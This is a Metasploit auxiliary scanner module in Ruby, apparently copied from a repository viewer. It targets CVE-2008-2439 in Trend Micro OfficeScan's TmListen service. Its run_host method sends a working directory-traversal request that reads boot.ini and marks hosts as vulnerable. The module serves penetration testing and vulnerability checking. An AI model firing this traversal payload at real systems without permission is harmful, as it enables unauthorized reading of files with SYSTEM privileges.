root / modules / auxiliary / admin / officescan / tmlisten_traversal.rb @ master
History | View | Annotate | Download (1.7 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# Framework web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/framework/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Auxiliary |
| 15 |
|
| 16 |
include Msf::Exploit::Remote::HttpClient |
| 17 |
include Msf::Auxiliary::Scanner |
| 18 |
|
| 19 |
def initialize |
| 20 |
super(
|
| 21 |
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access', |
| 22 |
'Version' => '$Revision$', |
| 23 |
'Description' => %q{ |
| 24 |
This module tests for directory traversal vulnerability in the UpdateAgent |
| 25 |
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro |
| 26 |
OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM |
| 27 |
via dot dot sequences in an HTTP request. |
| 28 |
},
|
| 29 |
'References' =>
|
| 30 |
[ |
| 31 |
[ 'OSVDB', '48730' ], |
| 32 |
[ 'CVE', '2008-2439' ], |
| 33 |
[ 'BID', '31531' ], |
| 34 |
[ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ], |
| 35 |
], |
| 36 |
'Author' => [ 'Anshul Pandey <anshul999[at]gmail.com>', 'patrick' ], |
| 37 |
'License' => MSF_LICENSE |
| 38 |
) |
| 39 |
|
| 40 |
register_options( |
| 41 |
[ |
| 42 |
Opt::RPORT(26122), |
| 43 |
], self.class)
|
| 44 |
end
|
| 45 |
|
| 46 |
def run_host(target_host) |
| 47 |
|
| 48 |
res = send_request_raw( |
| 49 |
{
|
| 50 |
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini', |
| 51 |
'method' => 'GET', |
| 52 |
}, 20)
|
| 53 |
|
| 54 |
http_fingerprint({ :response => res })
|
| 55 |
|
| 56 |
if (res.code >= 200) |
| 57 |
if (res.body =~ /boot/) |
| 58 |
vuln = "vulnerable."
|
| 59 |
else
|
| 60 |
vuln = "not vulnerable."
|
| 61 |
end
|
| 62 |
if (res.headers['Server']) |
| 63 |
print_status("http://#{target_host}:#{rport} is running #{res.headers['Server']} and is #{vuln}")
|
| 64 |
end
|
| 65 |
end
|
| 66 |
end
|
| 67 |
end
|